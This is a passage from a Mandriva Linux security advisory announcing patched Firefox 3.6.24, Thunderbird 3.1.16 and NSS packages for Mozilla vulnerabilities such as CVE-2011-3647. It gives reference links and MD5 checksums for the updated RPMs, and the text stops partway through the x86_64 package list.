The following vulnerabilities affects Mandriva Enterpriser Server
5.2 and Mandriva Linux 2010.2 only:
The JSSubScriptLoader in Mozilla Firefox before 3.6.24 and Thunderbird
before 3.1.6 does not properly handle XPCNativeWrappers during calls
to the loadSubScript method in an add-on, which makes it easier
for remote attackers to gain privileges via a crafted web site that
leverages certain unwrapping behavior, a related issue to CVE-2011-3004
(CVE-2011-3647).
Additionally, some packages which require so, have been rebuilt and
are being provided as updates.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3640
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3647
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3648
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3650
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3651
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3652
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3654
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3655
http://www.mozilla.org/security/announce/2011/mfsa2011-46.html
http://www.mozilla.org/security/announce/2011/mfsa2011-47.html
http://www.mozilla.org/security/announce/2011/mfsa2011-49.html
http://blog.mozilla.com/security/2011/11/03/revoking-trust-in-digicert-sdn-bhd-intermediate-certificate-authority/
http://www.mozilla.org/security/announce/2011/mfsa2011-48.html
http://www.mozilla.org/security/announce/2011/mfsa2011-52.html
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2010.1:
37032a053e431db2610a8e143899d314 2010.1/i586/beagle-0.3.9-40.21mdv2010.2.i586.rpm
5b5a606793d3577825f1dbabea4ac21a 2010.1/i586/beagle-crawl-system-0.3.9-40.21mdv2010.2.i586.rpm
978af8097b2dd3e37303d07ac576ccbb 2010.1/i586/beagle-doc-0.3.9-40.21mdv2010.2.i586.rpm
c9c9f389bc4c37d3a28dce922ad7c0ca 2010.1/i586/beagle-evolution-0.3.9-40.21mdv2010.2.i586.rpm
9a1f5c46365ceeab3ecb6161eb4e3fea 2010.1/i586/beagle-gui-0.3.9-40.21mdv2010.2.i586.rpm
eee6a420b83a5ffca2ce0385864913e2 2010.1/i586/beagle-gui-qt-0.3.9-40.21mdv2010.2.i586.rpm
c4f7c6a00f695dbc199c09321bbafc1f 2010.1/i586/beagle-libs-0.3.9-40.21mdv2010.2.i586.rpm
13be87f227b90f394ae5469ee9fa7c42 2010.1/i586/firefox-3.6.24-0.1mdv2010.2.i586.rpm
f2ad58511b095a81d4ba084ebe6b9bb1 2010.1/i586/firefox-af-3.6.24-0.1mdv2010.2.i586.rpm
c65dbaa0c796c8aa1b8a7d82640dd560 2010.1/i586/firefox-ar-3.6.24-0.1mdv2010.2.i586.rpm
0e4c0a411a9cb6c5b2c7ff349bbe83dc 2010.1/i586/firefox-be-3.6.24-0.1mdv2010.2.i586.rpm
55b560eaabc215f910df3389b064738d 2010.1/i586/firefox-bg-3.6.24-0.1mdv2010.2.i586.rpm
b262cac9fe564a7128217336dbd13c64 2010.1/i586/firefox-bn-3.6.24-0.1mdv2010.2.i586.rpm
678b3a2a3d671320eb853045863d6ac4 2010.1/i586/firefox-ca-3.6.24-0.1mdv2010.2.i586.rpm
a27da60ce20eafb9af01a0d5cec6c4a1 2010.1/i586/firefox-cs-3.6.24-0.1mdv2010.2.i586.rpm
0288b0d8d4d7498ab1c3ab9fbe153e5d 2010.1/i586/firefox-cy-3.6.24-0.1mdv2010.2.i586.rpm
7f51767c8f8f5d8fccb2a4c1ea67c855 2010.1/i586/firefox-da-3.6.24-0.1mdv2010.2.i586.rpm
117a8025cc74e96bfeaa55b27f18b9aa 2010.1/i586/firefox-de-3.6.24-0.1mdv2010.2.i586.rpm
1f1797055d4dc18fae5d71ec36f998d8 2010.1/i586/firefox-devel-3.6.24-0.1mdv2010.2.i586.rpm
9d7e226a63760042b74939cac3516b6c 2010.1/i586/firefox-el-3.6.24-0.1mdv2010.2.i586.rpm
4724b0e173d368f8e1f171a1a9e3e30c 2010.1/i586/firefox-en_GB-3.6.24-0.1mdv2010.2.i586.rpm
c4258de215eb10b59a51f671ea89b384 2010.1/i586/firefox-eo-3.6.24-0.1mdv2010.2.i586.rpm
8d5fd3f1a2fe25ca48a521fd119f478e 2010.1/i586/firefox-es_AR-3.6.24-0.1mdv2010.2.i586.rpm
2bec8682762f013001107eddd60c97bc 2010.1/i586/firefox-es_ES-3.6.24-0.1mdv2010.2.i586.rpm
b9f29ccae9980e4b2603e546e46c0670 2010.1/i586/firefox-et-3.6.24-0.1mdv2010.2.i586.rpm
fdbb723f338bf9cde017dd165e84d84f 2010.1/i586/firefox-eu-3.6.24-0.1mdv2010.2.i586.rpm
60f3c2c02381bacbcfd0b62d924fcd06 2010.1/i586/firefox-ext-beagle-0.3.9-40.21mdv2010.2.i586.rpm
330f8e9d8fc74e1e9d7a9b553fc15968 2010.1/i586/firefox-ext-blogrovr-1.1.804-13.17mdv2010.2.i586.rpm
3b9eae6e93ea6d4d97e23ea6a36da1de 2010.1/i586/firefox-ext-mozvoikko-1.0.1-2.17mdv2010.2.i586.rpm
9cdd8ca07362986fc0ccbe65f67c5f7e 2010.1/i586/firefox-ext-r-kiosk-0.8.1-2.17mdv2010.2.i586.rpm
8a1669d77c049c27583b230b5f115e95 2010.1/i586/firefox-ext-scribefire-3.5.2-2.17mdv2010.2.i586.rpm
e71d4cc6885a205b49cf415e9faacd39 2010.1/i586/firefox-ext-weave-sync-1.1-5.17mdv2010.2.i586.rpm
05798cf1a2f296e2e873511b7e625263 2010.1/i586/firefox-ext-xmarks-3.6.14-2.17mdv2010.2.i586.rpm
c3b24a424f2a9bc2a3b28d90f2e1a2eb 2010.1/i586/firefox-fi-3.6.24-0.1mdv2010.2.i586.rpm
d656ed68461292e42326b0fff866bff2 2010.1/i586/firefox-fr-3.6.24-0.1mdv2010.2.i586.rpm
dd375626b668fe46293891c5b4461b99 2010.1/i586/firefox-fy-3.6.24-0.1mdv2010.2.i586.rpm
4ca3eee0cfbd2110a683c6df414061cf 2010.1/i586/firefox-ga_IE-3.6.24-0.1mdv2010.2.i586.rpm
1ba4240f6d10bab1822b640eccb8cdd4 2010.1/i586/firefox-gl-3.6.24-0.1mdv2010.2.i586.rpm
632c3c3bd7ae843c896723d366979518 2010.1/i586/firefox-gu_IN-3.6.24-0.1mdv2010.2.i586.rpm
0332f7cb554ae1e801ba205ccaca8b37 2010.1/i586/firefox-he-3.6.24-0.1mdv2010.2.i586.rpm
60b1bce62d88276fb9a7c6ca7d74297e 2010.1/i586/firefox-hi-3.6.24-0.1mdv2010.2.i586.rpm
5ec59ceb974062887dbc24d408ec432a 2010.1/i586/firefox-hu-3.6.24-0.1mdv2010.2.i586.rpm
54644d2f1af52e8772388c4cc0cc3b37 2010.1/i586/firefox-id-3.6.24-0.1mdv2010.2.i586.rpm
726d7da04451c3d4babf644b5222f827 2010.1/i586/firefox-is-3.6.24-0.1mdv2010.2.i586.rpm
8e46d3e9c66602a68b8195e2670ebcee 2010.1/i586/firefox-it-3.6.24-0.1mdv2010.2.i586.rpm
fc83cc15dfc25aa8c767b452fe18af2e 2010.1/i586/firefox-ja-3.6.24-0.1mdv2010.2.i586.rpm
6be6d3dfa3d80cec981fcf592786d351 2010.1/i586/firefox-ka-3.6.24-0.1mdv2010.2.i586.rpm
3a650ea85ba1d6422b241b6ebe431433 2010.1/i586/firefox-kn-3.6.24-0.1mdv2010.2.i586.rpm
c779f5519af6dcb64811538b987e9e4e 2010.1/i586/firefox-ko-3.6.24-0.1mdv2010.2.i586.rpm
927749ec64ca267eb213f625d0fdc902 2010.1/i586/firefox-ku-3.6.24-0.1mdv2010.2.i586.rpm
690bae1f2eaa5bc7f3ac2cb8ad7c9af9 2010.1/i586/firefox-lt-3.6.24-0.1mdv2010.2.i586.rpm
7e8811a698d5a489874abf5515b42a6d 2010.1/i586/firefox-lv-3.6.24-0.1mdv2010.2.i586.rpm
cd525c6d3e7ffd7ae5f940389f5778a5 2010.1/i586/firefox-mk-3.6.24-0.1mdv2010.2.i586.rpm
0f348c4c69bb528782f131123227c4f2 2010.1/i586/firefox-mr-3.6.24-0.1mdv2010.2.i586.rpm
16af0393d64c2c261a6035d33a3c705d 2010.1/i586/firefox-nb_NO-3.6.24-0.1mdv2010.2.i586.rpm
7bb5b4c575ca8728ac76d8a991af8447 2010.1/i586/firefox-nl-3.6.24-0.1mdv2010.2.i586.rpm
731c8b90175d83b548686d8a1fb6a18e 2010.1/i586/firefox-nn_NO-3.6.24-0.1mdv2010.2.i586.rpm
4ef50c367725f253b36c1ca720df1f1c 2010.1/i586/firefox-oc-3.6.24-0.1mdv2010.2.i586.rpm
1a12782988d27b5eb56502c533974f88 2010.1/i586/firefox-pa_IN-3.6.24-0.1mdv2010.2.i586.rpm
f0c21446aa26c566e596097f4d85f28f 2010.1/i586/firefox-pl-3.6.24-0.1mdv2010.2.i586.rpm
87e6913c890aae54bd9f4c974510c597 2010.1/i586/firefox-pt_BR-3.6.24-0.1mdv2010.2.i586.rpm
0d6a868bd7aa61b6d52654dd61b0dc8e 2010.1/i586/firefox-pt_PT-3.6.24-0.1mdv2010.2.i586.rpm
3f4b33f3ed21caf3f7c12470d2829845 2010.1/i586/firefox-ro-3.6.24-0.1mdv2010.2.i586.rpm
158d8792bec7b0f4302efc5163264f72 2010.1/i586/firefox-ru-3.6.24-0.1mdv2010.2.i586.rpm
1a1767e367a36c2e54b0ee0936f4c996 2010.1/i586/firefox-si-3.6.24-0.1mdv2010.2.i586.rpm
751ca5154abd3b80085339b965718ebe 2010.1/i586/firefox-sk-3.6.24-0.1mdv2010.2.i586.rpm
2c2793ca1edfe66bfdbd30d153849e51 2010.1/i586/firefox-sl-3.6.24-0.1mdv2010.2.i586.rpm
8b0d54740d208056c91dbd631d774641 2010.1/i586/firefox-sq-3.6.24-0.1mdv2010.2.i586.rpm
d2ebed63785d5c793b4f24acaa5b1efa 2010.1/i586/firefox-sr-3.6.24-0.1mdv2010.2.i586.rpm
09b350731836ca992e8ca18333b82da7 2010.1/i586/firefox-sv_SE-3.6.24-0.1mdv2010.2.i586.rpm
64a6c4fd833090041496f1f58e2797af 2010.1/i586/firefox-te-3.6.24-0.1mdv2010.2.i586.rpm
1e600b18711cfb592e536a89b0494774 2010.1/i586/firefox-th-3.6.24-0.1mdv2010.2.i586.rpm
bc4898efa32b72593f5c1094e103fd76 2010.1/i586/firefox-tr-3.6.24-0.1mdv2010.2.i586.rpm
61f6cdd59382f660b847f766f270fc1e 2010.1/i586/firefox-uk-3.6.24-0.1mdv2010.2.i586.rpm
ed5305e6e8c3680fc9cea5e526d4c839 2010.1/i586/firefox-zh_CN-3.6.24-0.1mdv2010.2.i586.rpm
cfda9677f6c142a1e5bfbd38f14af10a 2010.1/i586/firefox-zh_TW-3.6.24-0.1mdv2010.2.i586.rpm
ad66b00ec205d5979a5c462491569a76 2010.1/i586/gjs-0.6-4.17mdv2010.2.i586.rpm
422d198c5974e5d1bf5d90f25f2ceab6 2010.1/i586/gnome-python-extras-2.25.3-18.17mdv2010.2.i586.rpm
b65ec68dfb6cafcd18e358b22fd87169 2010.1/i586/gnome-python-gda-2.25.3-18.17mdv2010.2.i586.rpm
2781d43968ace6a3f42dc55bcec5834e 2010.1/i586/gnome-python-gda-devel-2.25.3-18.17mdv2010.2.i586.rpm
2df8d12ec601c9d8abbb749ebd9dee26 2010.1/i586/gnome-python-gdl-2.25.3-18.17mdv2010.2.i586.rpm
c5ddea876829f2fc686e331f06767405 2010.1/i586/gnome-python-gtkhtml2-2.25.3-18.17mdv2010.2.i586.rpm
bcc8113b037a60a8791867a5f6ac15a8 2010.1/i586/gnome-python-gtkmozembed-2.25.3-18.17mdv2010.2.i586.rpm
a6e6abf888df376a312b5979efe052cc 2010.1/i586/gnome-python-gtkspell-2.25.3-18.17mdv2010.2.i586.rpm
01f69ac3c41657b99338db3c1fca0a37 2010.1/i586/libgjs0-0.6-4.17mdv2010.2.i586.rpm
cbcd054e67ec6e594ba690a22a0a1902 2010.1/i586/libgjs-devel-0.6-4.17mdv2010.2.i586.rpm
52b0aac851927f3debc4809074c41c16 2010.1/i586/libnss3-3.13.1-0.1mdv2010.2.i586.rpm
79ffc90a64c7e084bbcb6e58b2023b31 2010.1/i586/libnss-devel-3.13.1-0.1mdv2010.2.i586.rpm
c0c3dd1dcc10148891301ecb88f730b3 2010.1/i586/libnss-static-devel-3.13.1-0.1mdv2010.2.i586.rpm
253ee369fb5ce40a35929a9483ca55d4 2010.1/i586/libxulrunner1.9.2.24-1.9.2.24-0.1mdv2010.2.i586.rpm
1668768cb6e97a77019c8cdceb76f220 2010.1/i586/libxulrunner-devel-1.9.2.24-0.1mdv2010.2.i586.rpm
b7903439250609eb6ea7bd35af4be376 2010.1/i586/mozilla-thunderbird-3.1.16-0.1mdv2010.2.i586.rpm
5673afa348541bb3c1df2effeeb6ef57 2010.1/i586/mozilla-thunderbird-af-3.1.16-0.1mdv2010.2.noarch.rpm
19c81f66be42af11e27739d7cf53c12e 2010.1/i586/mozilla-thunderbird-ar-3.1.16-0.1mdv2010.2.noarch.rpm
b77e5b9b34ef568f4a5e8b62b163fc77 2010.1/i586/mozilla-thunderbird-be-3.1.16-0.1mdv2010.2.noarch.rpm
c4197fdf172cc9c1f1ac98a5b20e8049 2010.1/i586/mozilla-thunderbird-beagle-0.3.9-40.21mdv2010.2.i586.rpm
6c99bfa1e079740b3275db910822054d 2010.1/i586/mozilla-thunderbird-bg-3.1.16-0.1mdv2010.2.noarch.rpm
5121e0469895959d83f5324e958b1474 2010.1/i586/mozilla-thunderbird-bn_BD-3.1.16-0.1mdv2010.2.noarch.rpm
00d5a9a131e0916dcda3c6edf7068407 2010.1/i586/mozilla-thunderbird-ca-3.1.16-0.1mdv2010.2.noarch.rpm
7e7e01117a10c917d3c3e760a8bbaef1 2010.1/i586/mozilla-thunderbird-cs-3.1.16-0.1mdv2010.2.noarch.rpm
41df33a32538b50b38d5012304be8408 2010.1/i586/mozilla-thunderbird-da-3.1.16-0.1mdv2010.2.noarch.rpm
ce72c951fc80c5bc0d5854df75c4b790 2010.1/i586/mozilla-thunderbird-de-3.1.16-0.1mdv2010.2.noarch.rpm
0337c6ccd8435340c4e6b3010990003f 2010.1/i586/mozilla-thunderbird-el-3.1.16-0.1mdv2010.2.noarch.rpm
f4bdc978fc07ecfed3ef2f0dad2c223f 2010.1/i586/mozilla-thunderbird-en_GB-3.1.16-0.1mdv2010.2.noarch.rpm
43887f675538e6332c3a053676d33152 2010.1/i586/mozilla-thunderbird-enigmail-3.1.16-0.1mdv2010.2.i586.rpm
14c65e0022b712eed18790ef5e1b8867 2010.1/i586/mozilla-thunderbird-enigmail-ar-3.1.16-0.1mdv2010.2.noarch.rpm
f6270fe7ed24fbc98a64c2a605754a90 2010.1/i586/mozilla-thunderbird-enigmail-ca-3.1.16-0.1mdv2010.2.noarch.rpm
0d89be5ee310b49f3142d6b81b1f2628 2010.1/i586/mozilla-thunderbird-enigmail-cs-3.1.16-0.1mdv2010.2.noarch.rpm
db5018952556270560451259b521d15a 2010.1/i586/mozilla-thunderbird-enigmail-de-3.1.16-0.1mdv2010.2.noarch.rpm
81ab9beb0038ea16258c79259b12950f 2010.1/i586/mozilla-thunderbird-enigmail-el-3.1.16-0.1mdv2010.2.noarch.rpm
25812abb8381d91ab182bdfe28715fef 2010.1/i586/mozilla-thunderbird-enigmail-es-3.1.16-0.1mdv2010.2.noarch.rpm
c12237537ee7c3c9093cf82ec7c87dd2 2010.1/i586/mozilla-thunderbird-enigmail-fi-3.1.16-0.1mdv2010.2.noarch.rpm
c2dbcac60929708141d262b2ebd87910 2010.1/i586/mozilla-thunderbird-enigmail-fr-3.1.16-0.1mdv2010.2.noarch.rpm
9062fe8f58d112491fcfb20451eafaff 2010.1/i586/mozilla-thunderbird-enigmail-hu-3.1.16-0.1mdv2010.2.noarch.rpm
1ab294a00b0c1770a70c155f4f4eb08c 2010.1/i586/mozilla-thunderbird-enigmail-it-3.1.16-0.1mdv2010.2.noarch.rpm
7936b3969e0545f3344e39f205a1b189 2010.1/i586/mozilla-thunderbird-enigmail-ja-3.1.16-0.1mdv2010.2.noarch.rpm
45c34ae17ec46ca383a266a061c38eb5 2010.1/i586/mozilla-thunderbird-enigmail-ko-3.1.16-0.1mdv2010.2.noarch.rpm
2b155120b9fb33700b362da7d157236f 2010.1/i586/mozilla-thunderbird-enigmail-nb-3.1.16-0.1mdv2010.2.noarch.rpm
43181aedfe14fc14681eb7524d0380f6 2010.1/i586/mozilla-thunderbird-enigmail-nl-3.1.16-0.1mdv2010.2.noarch.rpm
2f41bddab6b54fc0f6bdf05f922f8816 2010.1/i586/mozilla-thunderbird-enigmail-pl-3.1.16-0.1mdv2010.2.noarch.rpm
0eaf1d7e2b3bec981b0040f833221ad4 2010.1/i586/mozilla-thunderbird-enigmail-pt-3.1.16-0.1mdv2010.2.noarch.rpm
f5c04da82bdc15c9c532374c6dd09d2a 2010.1/i586/mozilla-thunderbird-enigmail-pt_BR-3.1.16-0.1mdv2010.2.noarch.rpm
a12e1a7e4b10f030f77e4e45e0b5b05e 2010.1/i586/mozilla-thunderbird-enigmail-ru-3.1.16-0.1mdv2010.2.noarch.rpm
3ce665f11cf93120ea65c65e48aa30bc 2010.1/i586/mozilla-thunderbird-enigmail-sl-3.1.16-0.1mdv2010.2.noarch.rpm
143032100fcbc471afe5a5e6c44fce44 2010.1/i586/mozilla-thunderbird-enigmail-sv-3.1.16-0.1mdv2010.2.noarch.rpm
e76c981de9bedae55831c336617f3ffb 2010.1/i586/mozilla-thunderbird-enigmail-tr-3.1.16-0.1mdv2010.2.noarch.rpm
64928fed73cc9d03dcc909ef80351f9c 2010.1/i586/mozilla-thunderbird-enigmail-vi-3.1.16-0.1mdv2010.2.noarch.rpm
db5b0fbfec36f247e132e63ccb0daf8c 2010.1/i586/mozilla-thunderbird-enigmail-zh_CN-3.1.16-0.1mdv2010.2.noarch.rpm
7e663831202a9eef77cec5d6fa776ffa 2010.1/i586/mozilla-thunderbird-enigmail-zh_TW-3.1.16-0.1mdv2010.2.noarch.rpm
7e585a47d804830d04314411ea3edb0b 2010.1/i586/mozilla-thunderbird-es_AR-3.1.16-0.1mdv2010.2.noarch.rpm
96b11738e1f6c0b8deb4922f69542db8 2010.1/i586/mozilla-thunderbird-es_ES-3.1.16-0.1mdv2010.2.noarch.rpm
323d725d1bbdb087c7ccfde3fbf16a93 2010.1/i586/mozilla-thunderbird-et-3.1.16-0.1mdv2010.2.noarch.rpm
45954c0c40fbe229e53b7aa28fd32c84 2010.1/i586/mozilla-thunderbird-et_EE-3.1.16-0.1mdv2010.2.noarch.rpm
c846e4a76bb0bc0c4899761736d169ae 2010.1/i586/mozilla-thunderbird-eu-3.1.16-0.1mdv2010.2.noarch.rpm
67d36c30de5f9e83720119211e292ce1 2010.1/i586/mozilla-thunderbird-fi-3.1.16-0.1mdv2010.2.noarch.rpm
e3f1c7adea86b23f8c6d373c8c550a64 2010.1/i586/mozilla-thunderbird-fr-3.1.16-0.1mdv2010.2.noarch.rpm
ffe55176e5f735c4a80cd7275188890e 2010.1/i586/mozilla-thunderbird-fy-3.1.16-0.1mdv2010.2.noarch.rpm
ffe93b77e4d9ecdbf03f4a90c6906af4 2010.1/i586/mozilla-thunderbird-ga-3.1.16-0.1mdv2010.2.noarch.rpm
08c1ba07ef42a91d2047ffa320c95baa 2010.1/i586/mozilla-thunderbird-gd-3.1.16-0.1mdv2010.2.noarch.rpm
4cb52893647d843b55d8290931909d19 2010.1/i586/mozilla-thunderbird-gl-3.1.16-0.1mdv2010.2.noarch.rpm
68f9e92e63b4fb26fc31d28fcc740f56 2010.1/i586/mozilla-thunderbird-he-3.1.16-0.1mdv2010.2.noarch.rpm
d93c75e05f19ecd411469a69d6e590a0 2010.1/i586/mozilla-thunderbird-hu-3.1.16-0.1mdv2010.2.noarch.rpm
5e7ddcf2c743d18515a7030cf76b434c 2010.1/i586/mozilla-thunderbird-id-3.1.16-0.1mdv2010.2.noarch.rpm
ab50d2ed5a135497108fd6922d6938c5 2010.1/i586/mozilla-thunderbird-is-3.1.16-0.1mdv2010.2.noarch.rpm
2f3ee53b0d2fa64e3dff8f9e01c49744 2010.1/i586/mozilla-thunderbird-it-3.1.16-0.1mdv2010.2.noarch.rpm
5d2a3afc35e4b875b47534849014db54 2010.1/i586/mozilla-thunderbird-ja-3.1.16-0.1mdv2010.2.noarch.rpm
f6c2e98de4c3cbaad2c96ab3c3b5c0de 2010.1/i586/mozilla-thunderbird-ka-3.1.16-0.1mdv2010.2.noarch.rpm
fc0b79f9dc44a4a961fc81edd14809f9 2010.1/i586/mozilla-thunderbird-ko-3.1.16-0.1mdv2010.2.noarch.rpm
cd74b9ad62b9fab5863e9c029fef9bb8 2010.1/i586/mozilla-thunderbird-lightning-3.1.16-0.1mdv2010.2.i586.rpm
2e9dbd67cee0ae51f3df865b8f2c2f39 2010.1/i586/mozilla-thunderbird-lt-3.1.16-0.1mdv2010.2.noarch.rpm
f9ab6b4cf51e9c553c0b8b863a4b9f53 2010.1/i586/mozilla-thunderbird-nb_NO-3.1.16-0.1mdv2010.2.noarch.rpm
70b5f322882a862916804803276c1848 2010.1/i586/mozilla-thunderbird-nl-3.1.16-0.1mdv2010.2.noarch.rpm
1e5d5c943df30931bdcb7ef03fd976cb 2010.1/i586/mozilla-thunderbird-nn_NO-3.1.16-0.1mdv2010.2.noarch.rpm
96b1539a07eb727f7ff358edb592b60e 2010.1/i586/mozilla-thunderbird-pa_IN-3.1.16-0.1mdv2010.2.noarch.rpm
0c5866fc17632676540ecadf256b43d2 2010.1/i586/mozilla-thunderbird-pl-3.1.16-0.1mdv2010.2.noarch.rpm
7cf914c3e1616b6730dd725ee21250d9 2010.1/i586/mozilla-thunderbird-pt_BR-3.1.16-0.1mdv2010.2.noarch.rpm
6011345930a95908d4a99b54a48103a4 2010.1/i586/mozilla-thunderbird-pt_PT-3.1.16-0.1mdv2010.2.noarch.rpm
f1d4ff30f5f840ca3c0fdc554bb238bd 2010.1/i586/mozilla-thunderbird-ro-3.1.16-0.1mdv2010.2.noarch.rpm
fc2dc23592a663f31035deb182e621da 2010.1/i586/mozilla-thunderbird-ru-3.1.16-0.1mdv2010.2.noarch.rpm
0ed496aaf48d7ec7f829af3791fae769 2010.1/i586/mozilla-thunderbird-si-3.1.16-0.1mdv2010.2.noarch.rpm
ad81f8f11ed2132b392f0556e163b23d 2010.1/i586/mozilla-thunderbird-sk-3.1.16-0.1mdv2010.2.noarch.rpm
28c2db524e9abf8939d4f3b6904cda63 2010.1/i586/mozilla-thunderbird-sl-3.1.16-0.1mdv2010.2.noarch.rpm
de7a6660868ef8f9b39527e28d1fa57f 2010.1/i586/mozilla-thunderbird-sq-3.1.16-0.1mdv2010.2.noarch.rpm
deabf5a913b39f800ec04c9955339291 2010.1/i586/mozilla-thunderbird-sr-3.1.16-0.1mdv2010.2.noarch.rpm
62a0926791fd9ca0851ca0d00a3b3ecf 2010.1/i586/mozilla-thunderbird-sv_SE-3.1.16-0.1mdv2010.2.noarch.rpm
17f11316f36056baacd4d0b9df4c7ac3 2010.1/i586/mozilla-thunderbird-tr-3.1.16-0.1mdv2010.2.noarch.rpm
bbeb156fc8748b01eac13ad2f631378d 2010.1/i586/mozilla-thunderbird-uk-3.1.16-0.1mdv2010.2.noarch.rpm
668216547d2a1b84e9deaee4bda0222f 2010.1/i586/mozilla-thunderbird-vi-3.1.16-0.1mdv2010.2.noarch.rpm
3c8009b53b5ec2ef50436b883feac1c7 2010.1/i586/mozilla-thunderbird-zh_CN-3.1.16-0.1mdv2010.2.noarch.rpm
af60c6e191397369cb61f0b041e06674 2010.1/i586/mozilla-thunderbird-zh_TW-3.1.16-0.1mdv2010.2.noarch.rpm
718bfc0ee2f533de907ab0e4177f28c1 2010.1/i586/nsinstall-3.1.16-0.1mdv2010.2.i586.rpm
3114d23e464a7fedf9fa666161735053 2010.1/i586/nss-3.13.1-0.1mdv2010.2.i586.rpm
7e9a705fc40947819ee5f6d17d54bbeb 2010.1/i586/rootcerts-20111103.00-1mdv2010.2.i586.rpm
68d336914d3a8935437e387325030104 2010.1/i586/rootcerts-java-20111103.00-1mdv2010.2.i586.rpm
9478bae2be35d3be00b6ddf74c73df21 2010.1/i586/xulrunner-1.9.2.24-0.1mdv2010.2.i586.rpm
c90faaa3c484f01536b45ea3d3603bc8 2010.1/i586/yelp-2.30.1-4.17mdv2010.2.i586.rpm
d3174b3f369b61a608e05fefea606d65 2010.1/SRPMS/beagle-0.3.9-40.21mdv2010.2.src.rpm
f2d0b9b2bec01707a8ff4b203e967872 2010.1/SRPMS/firefox-3.6.24-0.1mdv2010.2.src.rpm
8ee066eb05d1c6260fc0dd0546edac45 2010.1/SRPMS/firefox-ext-blogrovr-1.1.804-13.17mdv2010.2.src.rpm
de634a8f79d89a8b0002f620594f12ef 2010.1/SRPMS/firefox-ext-mozvoikko-1.0.1-2.17mdv2010.2.src.rpm
0079a81800becc30b43020042b517ecc 2010.1/SRPMS/firefox-ext-r-kiosk-0.8.1-2.17mdv2010.2.src.rpm
40eee07899a7670d3c95dc49a219c273 2010.1/SRPMS/firefox-ext-scribefire-3.5.2-2.17mdv2010.2.src.rpm
eabb56231c3a73813bba9e3c9e8f2f9c 2010.1/SRPMS/firefox-ext-weave-sync-1.1-5.17mdv2010.2.src.rpm
e2763c105c42f815d696ae4d944393b7 2010.1/SRPMS/firefox-ext-xmarks-3.6.14-2.17mdv2010.2.src.rpm
df56bf25f4a3a520499d1baa2dcb07ae 2010.1/SRPMS/firefox-l10n-3.6.24-0.1mdv2010.2.src.rpm
7ddf058d3e02488468a1502795562fb0 2010.1/SRPMS/gjs-0.6-4.17mdv2010.2.src.rpm
a2fa7ea38d7ed5b9c0ba837217b87e22 2010.1/SRPMS/gnome-python-extras-2.25.3-18.17mdv2010.2.src.rpm
587405665ced72877e71cffef3a858ff 2010.1/SRPMS/mozilla-thunderbird-3.1.16-0.1mdv2010.2.src.rpm
e5eda91084de3858c43751bd26968ceb 2010.1/SRPMS/mozilla-thunderbird-l10n-3.1.16-0.1mdv2010.2.src.rpm
c80fab55df58911b4f383408fb65311f 2010.1/SRPMS/nss-3.13.1-0.1mdv2010.2.src.rpm
9b3ae0a7187d61e5a60b0dcfe2284dfe 2010.1/SRPMS/rootcerts-20111103.00-1mdv2010.2.src.rpm
c8b86417f2d11df280cb5ee8538e17a0 2010.1/SRPMS/xulrunner-1.9.2.24-0.1mdv2010.2.src.rpm
fa9a1bff3f57121ed598449d58fc7941 2010.1/SRPMS/yelp-2.30.1-4.17mdv2010.2.src.rpm
Mandriva Linux 2010.1/X86_64:
98cb7f79cd751ca77ec6b123353ee9d1 2010.1/x86_64/beagle-0.3.9-40.21mdv2010.2.x86_64.rpm
ec069d87166bb05971e7e79664295ade 2010.1/x86_64/beagle-crawl-system-0.3.9-40.21mdv2010.2.x86_64.rpm
d019730651cee4b4dc32ff30015b6fff 2010.1/x86_64/beagle-doc-0.3.9-40.21mdv2010.2.x86_64.rpm
5135b419fe54656026c33d9a89aeeccd 2010.1/x86_64/beagle-evolution-0.3.9-40.21mdv2010.2.x86_64.rpm
98eb7fbcf93eedf795d446618b022d80 2010.1/x86_64/beagle-gui-0.3.9-40.21mdv2010.2.x86_64.rpm
990acd7b8cce9f0a73cb200a94d036fd 2010.1/x86_64/beagle-gui-qt-0.3.9-40.21mdv2010.2.x86_64.rpm
ea87f6006cca923b806f41ca6666b662 2010.1/x86_64/beagle-libs-0.3.9-40.21mdv2010.2.x86_64.rpm
f71877f4fd8de748cde910ecc0fd28f7 2010.1/x86_64/firefox-3.6.24-0.1mdv2010.2.x86_64.rpm
6e1516a3564ab4fa4b2c5b15ed751342 2010.1/x86_64/firefox-af-3.6.24-0.1mdv2010.2.x86_64.rpm
750039bf4f3daa6e3906853f285449d7 2010.1/x86_64/firefox-ar-3.6.24-0.1mdv2010.2.x86_64.rpm
30b3c396a61548b85a8d7005cb789bf7 2010.1/x86_64/firefox-be-3.6.24-0.1mdv2010.2.x86_64.rpm
4d54cb8c38e6d3a45e304bd7e01a5f2e 2010.1/x86_64/firefox-bg-3.6.24-0.1mdv2010.2.x86_64.rpm
f42768af99c88f515bb5d25c89aa52b7 2010.1/x86_64/firefox-bn-3.6.24-0.1mdv2010.2.x86_64.rpm
7fa7a036f22e5a08e10ba228d064cc19 2010.1/x86_64/firefox-ca-3.6.24-0.1mdv2010.2.x86_64.rpm
d58c718a2438022072e12285b9129957 2010.1/x86_64/firefox-cs-3.6.24-0.1mdv2010.2.x86_64.rpm
52dc0976205c790132b2e03d2b51747e 2010.1/x86_64/firefox-cy-3.6.24-0.1mdv2010.2.x86_64.rpm
aef10a7046cef7ba1cbf4e6c8e6ae57b 2010.1/x86_64/firefox-da-3.6.24-0.1mdv2010.2.x86_64.rpm
a4e6d0d7bfc3837012086f8185b4e45d 2010.1/x86_64/firefox-de-3.6.24-0.1mdv2010.2.x86_64.rpm
273d20e8a27bb2fdd18bd54f97799959 2010.1/x86_64/firefox-devel-3.6.24-0.1mdv2010.2.x86_64.rpm
d1c0dccfd0370e601b96183452c159d7 2010.1/x86_64/firefox-el-3.6.24-0.1mdv2010.2.x86_64.rpm
82b4ea67706ad6e136c37484d6e01c95 2010.1/x86_64/firefox-en_GB-3.6.24-0.1mdv2010.2.x86_64.rpm
9d486dd5aa6147a1bd8f40f023647b2c 2010.1/x86_64/firefox-eo-3.6.24-0.1mdv2010.2.x86_64.rpm
